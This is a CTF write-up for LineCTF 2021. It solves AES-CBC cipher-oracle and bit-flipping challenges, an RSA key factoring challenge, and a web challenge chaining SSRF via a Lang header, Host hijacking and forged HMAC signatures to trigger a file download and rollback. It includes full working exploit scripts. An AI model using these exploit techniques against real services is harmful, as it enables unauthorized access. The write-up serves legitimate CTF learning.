LineCTF 2021

Categories index
Crypto - Web

Crypto

babycrypto1

nc 35.200.115.41 16001

This challenge was quite a ride! The solution we ended up using is more complicated than it should be, therefore we’ll provide both easy and alternative solution.

These first two crypto challenges are based on AES-CBC 128 cipher and involve some common attacks on this mode of operation.

As a reminder, this is the decryption scheme of CBC.

AES-CBC decrypt

Here follows the script being served:

#!/usr/bin/env python
from base64 import b64decode
from base64 import b64encode
import socket
import multiprocessing

from Crypto.Cipher import AES
from Crypto.Random import get_random_bytes
from Crypto.Util.Padding import pad, unpad
import hashlib
import sys

class AESCipher:
    def __init__(self, key):
        self.key = key

    def encrypt(self, data):
        iv = get_random_bytes(AES.block_size)
        self.cipher = AES.new(self.key, AES.MODE_CBC, iv)
        return b64encode(iv + self.cipher.encrypt(pad(data,
            AES.block_size)))

    def encrypt_iv(self, data, iv):
        self.cipher = AES.new(self.key, AES.MODE_CBC, iv)
        return b64encode(iv + self.cipher.encrypt(pad(data,
            AES.block_size)))

    def decrypt(self, data):
        raw = b64decode(data)
        self.cipher = AES.new(self.key, AES.MODE_CBC, raw[:AES.block_size])
        return unpad(self.cipher.decrypt(raw[AES.block_size:]), AES.block_size)

flag = open("flag", "rb").read().strip()

COMMAND = [b'test',b'show']

def run_server(client, aes_key, token):
    client.send(b'test Command: ' + AESCipher(aes_key).encrypt(token+COMMAND[0]) + b'\n')
    client.send(b'**Cipher oracle**\n')
    client.send(b'IV...: ')
    iv = b64decode(client.recv(1024).decode().strip())
    client.send(b'Message...: ')
    msg = b64decode(client.recv(1024).decode().strip())
    client.send(b'Ciphertext:' + AESCipher(aes_key).encrypt_iv(msg,iv) + b'\n\n')
    while(True):
        client.send(b'Enter your command: ')
        tt = client.recv(1024).strip()
        tt2 = AESCipher(aes_key).decrypt(tt)
        client.send(tt2 + b'\n')
        if tt2 == token+COMMAND[1]:
            client.send(b'The flag is: ' + flag)
            client.close()
            break

if __name__ == '__main__':
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    server.bind(('0.0.0.0', 16001))
    server.listen(1)

    while True:
        client, address = server.accept()

        aes_key = get_random_bytes(AES.block_size)
        token = b64encode(get_random_bytes(AES.block_size*10))[:AES.block_size*10]

        process = multiprocessing.Process(target=run_server, args=(client, aes_key, token))
        process.daemon = True
        process.start()

That cipher oracle is a serious problem, since we’re allowed to use an arbitrary IV and Message, due to the CBC inner workings, we can change an already encrypted message.

Furthermore, we have an encrypted token + "test" message and, luckily for us, the token ending coincides with a block ending. This means that the message is in a block of it’s own…

Knowing these two things, we give to the cipher oracle the IV of the block previous to the test message and create a new block with the show message.

from pwn import *

conn = remote('35.200.115.41', 16001)

log.info('get test command')
conn.recvuntil('test Command:' )
test_cmd_enc = b64d( conn.recvline().strip() )
iv = test_cmd_enc[:16]
enc_msg = test_cmd_enc[16:]

log.info('cipher oracle')
conn.sendline( b64e(enc_msg[144:160]) ) # iv
conn.sendline( b64e(b'show') )          # msg
conn.recvuntil('Ciphertext:')
ct_no_iv = b64d( conn.recvline().strip() )[16:]

log.info('forge command')
conn.sendline( b64e(iv + enc_msg[:160] + ct_no_iv) )

try:
    while True: print(conn.recv())
except: conn.close()

And now, the creative alternative way… 😆

This challenge could also be solved without using the cipher oracle and instead applying a recursive Bit Flipping attack. On a side note, this attack is also the intended way to solve the the next challenge.

The idea is simple, in AES-CBC, modifying the ciphertext of a block is possible to change plaintext of the next block at the cost of garbling up the plaintext of the current block.

Conveniently for us:

  • There isn’t a limit to the decryptable messages

  • The IV can be changed since is used the one prepended to the message and not a fixed one

  • The initial encrypted message with the token and the test message can be sent back to retrieve the token

Going backwards we can modify the last block with show instead of test and take the xor of the resulting garbled token plaintext with the correct part of the token. Repeating this procedure we can modify the message and retrieve the flag.

from pwn import *

conn = remote('35.200.115.41', 16001)

log.info('get test command')
conn.recvuntil('test Command:' )
test_cmd_enc = b64d(conn.recvline().strip())
iv = test_cmd_enc[:16]
enc_msg = test_cmd_enc[16:]

log.info('skip cipher oracle')
conn.sendline('/0otYvyOVhXqYNOtTkiLpg==')
conn.sendline('show')

log.info('get token')
conn.recvuntil('command: ')
conn.sendline(b64e(test_cmd_enc))
test_cmd_dec = (conn.recvline().strip())
token = test_cmd_dec[:160]

# change test -> show in block #11
log.info('change command')
conn.recvuntil('command: ')
enc_msg = enc_msg[:144] + xor(xor('test', 'show'), enc_msg[144:148]) + enc_msg[148:]
conn.sendline(b64e(iv + enc_msg))

# Fix token for block #10 to #2
_log = log.progress('fix previous blocks')
for i in range(9):
    _log.status(f'block {10-i}')
    tmp_msg = conn.recvline().strip() # token + command

    block_start_idx = (16*(9-i))
    block_end_idx = (16*(9-i) + 16)

    scramble_block = tmp_msg[block_start_idx : block_end_idx]
    log.info(f"s: {scramble_block}")

    token_block = token[block_start_idx : block_end_idx]
    log.info(f"t: {token_block}")

    fix_str = xor(scramble_block, token_block)

    # xor the fix string to the ciphertext of the previous block
    start_pre_block = block_start_idx -16
    enc_msg = enc_msg[:start_pre_block] + xor(fix_str, enc_msg[start_pre_block:block_start_idx]) + enc_msg[block_start_idx:]

    conn.recvuntil('command: ')
    conn.sendline(b64e(iv + enc_msg))
_log.success('done')

log.info('change iv to fix first block')
tmp_msg = conn.recvline().strip() # token + command
scramble_block = tmp_msg[:16]
token_block = token[:16]
fix_str = xor(scramble_block, token_block)

conn.recvuntil('command: ')
conn.sendline(b64e(xor(iv, fix_str) + enc_msg))

try:
    while True: print(conn.recv())
except: conn.close()

🏁 LINECTF{warming_up_crypto_YEAH}

babycrypto2

nc 35.200.39.68 16002

This is similar to the previous challenge babycrytpo1.

...
flag = open("flag", "rb").read().strip()

AES_KEY = get_random_bytes(AES.block_size)
TOKEN = b64encode(get_random_bytes(AES.block_size*10-1))
COMMAND = [b'test',b'show']
PREFIX = b'Command: '

def run_server(client):
    client.send(b'test Command: ' + AESCipher(AES_KEY).encrypt(PREFIX+COMMAND[0]+TOKEN) + b'\n')
    while(True):
        client.send(b'Enter your command: ')
        tt = client.recv(1024).strip()
        tt2 = AESCipher(AES_KEY).decrypt(tt)
        client.send(tt2 + b'\n')
        if tt2 == PREFIX+COMMAND[1]+TOKEN:
            client.send(b'The flag is: ' + flag)
            client.close()
            break

if __name__ == '__main__':
...
        process = multiprocessing.Process(target=run_server, args=(client, ))
...

The Cipher Oracle is now gone and the only thing we can change is the IV of the message since it’s still read from the first 16 bytes of the sent message.

Previously the command was appended as the last block, now it’s at the beginning after a prefix PREFIX = b'Command: '.

Observe that the PREFIX + command are well within the 16 bytes limit of the first block.

Using the Bit Flipping Attack we can modify the IV to change the test bytes in the first block to show, without having to worry about messing up previous blocks.

AES-CBC Bit Flipping

from base64 import b64decode, b64encode

test_cmd = "b64encoded_received_msg"

msg = list(b64decode(test_cmd))

msg[9]  ^= (ord('t')^ord('s')) # t > s
msg[10] ^= (ord('e')^ord('h')) # e > h
msg[11] ^= (ord('s')^ord('o')) # s > o
msg[12] ^= (ord('t')^ord('w')) # t > w

print( b64encode(bytes(msg)) )

🏁 LINECTF{echidna_kawaii_and_crypto_is_difficult}

babycrypto3

Please decrypt and get flag.

Flag is LINECTF{<decrypted text>} and decrypted text is human-readable text.

-----BEGIN PUBLIC KEY-----
ME0wDQYJKoZIhvcNAQEBBQADPAAwOQIyAyixQTmi5UuIpGYvGmfMOs0ZKcm2J5S7
ZJFq/wKZH4BFbk0O7U1ZHfdwjVry6bT7VokCAwEAAQ==
-----END PUBLIC KEY-----

Here we have a public key with a related ciphertext.

RsaCtfTool to the help… In fact, after a few minutes we find that the SageMath payload cm_factor succeeded!

$ py RsaCtfTool.py --publickey pub.pem --uncipherfile ciphertext.txt --attack cm_factor
...
[*] Attack success with cm_factor method !
...
STR : b'\x00\x02`g\xff\x85\x1e\xcd\xcba\xe5\x0b\x83\xa5\x15\xe3\x00Q0xPU0lORyBUSEUgRElTVEFOQ0UuCg==\n'

$ echo "Q0xPU0lORyBUSEUgRElTVEFOQ0UuCg==" | base64 -d
CLOSING THE DISTANCE.

🏁 LINECTF{CLOSING THE DISTANCE.}


Web

diveinternal

Target the server’s internal entries, access admin, and roll back.
Keytime: Asia/Japan

http://xxx.xxx.xxx.xxx/

After navigating to the challenge’s IP, we are presented with a page that contains what looks like a crypto ticker, refreshing every five seconds.

diveinternals Home

The About page doesn’t contain anything interesting at first glance, and the Subscribe page lets us enter an email address and replies with a simple text-only confirmation.

diveinternals Subscribe

So, given the challenge’s description, we should:

  1. Target the server’s internal entries
  2. Access admin
  3. Roll back

…whatever those mean. Luckily enough the source code for the challenge was given, and the team at LINE was nice enough to package everything up in Docker containers and provide a docker-compose config to reproduce their deployment on your machine. Here’s a relevant excerpt (screen space is a premium resource):

services:
    nginx:
        build:
            context: ./nginx/
        ports:
            - "12004:80"
        networks:
            - ctf-network
    public:
        build:
            context: ./public/
        networks:
            - ctf-network
    private:
        build: ./private/
        networks:
            - ctf-network
        environment:
            - 'RUN=flask run --host=0.0.0.0 --port=5000'
            - DBFILE=database/master.db
networks:
   ctf-network:

So, what do we have here? First things first, let’s note that all the services will be running unrestricted in a common virtual network, so they’ll be reachable from each other by using their service name as hostname.

An NGINX instance that reverse-proxies the public container, judging by the config in its build dir:

server {
    location / {
        proxy_pass http://public:3000;
    }
}

Note: the complete config file had several more Lua shenanigans messing with caching and headers formatting, none of which I’ve recognized as useful for solving this challenge but may have given additional insights. If anything, some headers rewriting could have been needed to actually make the intended exploit work.

Next we have the public service, which apparently is just a frontend that calls to the private backend. Here are the relevant routes definitions, with context added where needed:

const target = 'private:5000';

router.get('/apis/', function(req, res, next) {
  request({
    headers: req.headers,
    uri: `http://${target}/`,
  }, function(err, data){
    res.render('index', { title: 'apis' , data: data.body});
  });

});

router.get('/apis/addsub', function(req, res, next) {
  request({
    uri: `http://${target}/addsub`,
    qs: { email: req.query.email }
  }).pipe(res);
});

We can already see that the only ways we have to interact with the private backend are through GETting its root with some headers or through an email query parameter directed at the addsub endpoint.

Cutting to the juicy bits, here’s a portion of the private service, rewritten and minimized as needed (that is to say: don’t try to paste this in an interpreter, it won’t work):

privateKey = b'let\'sbitcorinparty'

class Activity():
    def __init__(self):
        self.dbHash = hashlib.md5(open('database/master.db','rb').read()).hexdigest()
        self.integrityKey = hashlib.sha512((self.dbHash).encode('ascii')).hexdigest()

    def IntegrityCheck(self,key, dbHash):
        if self.integrityKey != key:
            # Return invalid key error
        if self.dbHash != dbHash:
            flag = RunRollbackDB(dbHash)
            file = open('database/master.db','rb').read()
            self.dbHash = hashlib.md5(file).hexdigest()
            self.integrityKey = hashlib.sha512((self.dbHash).encode('ascii')).hexdigest()
            return flag
        return "DB is safe!"

    def run(self):
        schedule.every(6).seconds.do(self.IntegrityCheck)
        schedule.every(2).seconds.do(self.UpdateIntegrityKey)
        schedule.every(2).seconds.do(self.BackupDB)

def WriteFile(url):
    local_filename = url.split('/')[-1]
    with requests.get(url, stream=True) as r:
        with open('backup/'+local_filename, 'wb') as f:
            # Write the contents of the response in the file

def LanguageNomarize(request):
    if request.headers.get('Lang') is None:
        return "en"
    else:
        regex = '^[!@#$\\/.].*/.*' # Easy~~
        language = request.headers.get('Lang')
        language = re.sub(r'%00|%0d|%0a|[!@#$^]|\.\./', '', language)
        if re.search(regex,language):
            return request.headers.get('Lang')
        try:
            data = requests.get(request.host_url+language, headers=request.headers)
            if data.status_code == 200:
                return data.text
            else:
                return request.headers.get('Lang')
        except:
            return request.headers.get('Lang')

def SignCheck(request):
    sigining = hmac.new(privateKey , request.query_string, hashlib.sha512)
    return sigining.hexdigest() == request.headers.get('Sign')

@app.route('/en', methods=['GET'])
def en():
    return 'en'

@app.route('/coin', methods=['GET'])
def coin():
    response = app.response_class()
    language = LanguageNomarize(request)
    response.headers["Lang"] = language
    data = getCoinInfo()
    response.data = json.dumps(data)
    return response

@app.route('/download', methods=['GET'])
def download():
    if !SignCheck(request):
        # Return invalid signing key error
    src = request.args.get('src')
    if src == None:
        # Return missing resource error
    WriteFile(src)
    # Return success message

@app.route('/addsub', methods=['GET'])
def addsub():
    regex = '^[a-z0-9]+[\._]?[a-z0-9]+[@]\w+[.]\w{2,3}$'
    email = request.args.get('email')
    if (email is None) or (len(email)>100):
        # Return invalid email error
    if re.search(regex,email):
        # Add subscriber to DB and return success message
    else:
        # Return invalid email error

@app.route('/integrityStatus', methods=['GET'])
def integritycheck():
    data = {'db':'database/master.db','dbhash':activity.dbHash}
    return json.dumps(data)

@app.route('/rollback', methods=['GET'])
def rollback():
    if !SignCheck(request):
        # Return invalid signing key error
    if request.headers.get('Key') == None:
        # Return invalid key error
    result  = activity.IntegrityCheck(request.headers.get('Key'),request.args.get('dbhash'))
    return result

def RunRollbackDB(dbhash):
    if dbhash is None:
        return "dbhash is None"
    dbhash = ''.join(e for e in dbhash if e.isalnum())
    if os.path.isfile('backup/'+dbhash):
        with open('FLAG', 'r') as f:
            flag = f.read()
            return flag
    else:
        return "Where is file?"

def RunbackupDB(remove, dbhash):
    subprocess.Popen(r'rm backup/*' , shell=True).wait()
    subprocess.Popen(r'cp ' + 'database/master.db' + ' backup/' + dbhash, shell=True).wait()
    return dbhash

Summarizing a couple of things:

  • Every few seconds a background thread updates the integrityKey and the dbHash, both derived from the MD5 sum of the current contents of the DB.
    • We can get the base hash from the /integrityStatus endpoint and calculate the rest by copying the service’s code.
  • Likewise, we can sign our own requests since we have the code of the SignCheck function as well as the private key used in it.
  • To get the flag, we have to call the RunRollbackDB function somehow, passing it the name of a file that exists in the /backup folder.
    • A background worker cleans that directory every couple of seconds and puts there a backup of the current DB.
    • Since IntegrityCheck only lets us roll back to a version of the DB that does not match the current hash, we can’t trigger a rollback with only the infos that /integrityStatus gives us.
  • The LanguageNomarize parser tries to resolve an URL that includes a user-controlled segment.
    • We can leverage that from the /coin endpoint.
    • A filtering RegEx prevents HTTP request hijacks based on carriage returns and newlines.

From these observations, a rather weird path to exploitation can be devised:

  1. SSRF via the Lang header in the /apis/coin endpoint of the public service.
    • Hijack the target host to private:5000 via the Host header.
  2. Obtain dbHash from /integrityStatus.
    • Use it to calculate Sign (affected by query string) and Key (affected by DB contents) headers as needed.
  3. Make the API “download itself” in the backup directory by calling the private /download endpoint, using http://localhost:5000/integrityStatus to generate some data.
    • This will create a file named “integrityStatus” in the backup directory that will exist until the next scheduled cleanup cycle. The content of such file aren’t important, any other endpoint could have been used.
  4. Use the name of the downloaded file to trigger a rollback through the private /rollback endpoint.
  5. If all went well, the Lang header of the response should be populated with the flag.
    • Since this attack depends on exact timings and the environment is shared between all the CTF participants, it may take a few tries to succeed in a live environment.
#!/usr/bin/env python3

import hashlib, hmac, json, requests

HOST = 'xxx.xxx.xxx.xxx'

# Pulled from /private/app/main.py @ L21
privateKey = b'let\'sbitcorinparty'

# Pulled from /private/app/main.py @ L61
def integrityKey(dbHash):
  retVal = hashlib.sha512((dbHash).encode('ascii')).hexdigest()
  return retVal

# Pulled from /private/app/main.py @ L152
def sign(query):
  retVal = hmac.new(privateKey, query.encode('ascii'), hashlib.sha512).hexdigest()
  return retVal

if __name__ == '__main__':
  i = 1
  while True:
    print(f'Try #{i}...', end='\r')

    # Get the hash of the current DB
    response = requests.get(f'http://{HOST}/apis/coin', headers={
      'Host': 'private:5000',
      'Lang': 'integrityStatus',
    })
    dbHash = json.loads(response.headers['lang'])['dbhash']

    # Make the API download itself in the backup dir
    query = 'src=http%3A%2F%2Flocalhost%3A5000%2FintegrityStatus'
    response = requests.get(f'http://{HOST}/apis/coin', headers={
      'Host': 'private:5000',
      'Lang': f'download?{query}',
      'Sign': sign(query)
    })

    # Use the name of the downloaded file to trigger a rollback
    query = 'dbhash=integrityStatus'
    response = requests.get(f'http://{HOST}/apis/coin', headers={
      'Host': 'private:5000',
      'Lang': f'rollback?{query}',
      'Sign': sign(query),
      'Key': integrityKey(dbHash)
    })

    # Multiple tries may be needed due to regular backup dir cleanup
    reply = response.headers['lang']
    if 'LINECTF{' in reply:
      print(f'Flag found! {reply}')
      break
    else:
      print(f'Wrong timing, retrying (\'{reply}\')')
      i += 1

This challenge had quite a bit of distractions and dead ends built in but in the end, as usual, the working exploit turned out to be conceptually simple.

🏁 LINECTF{YOUNGCHAYOUNGCHABITCOINADAMYMONEYISBURNING}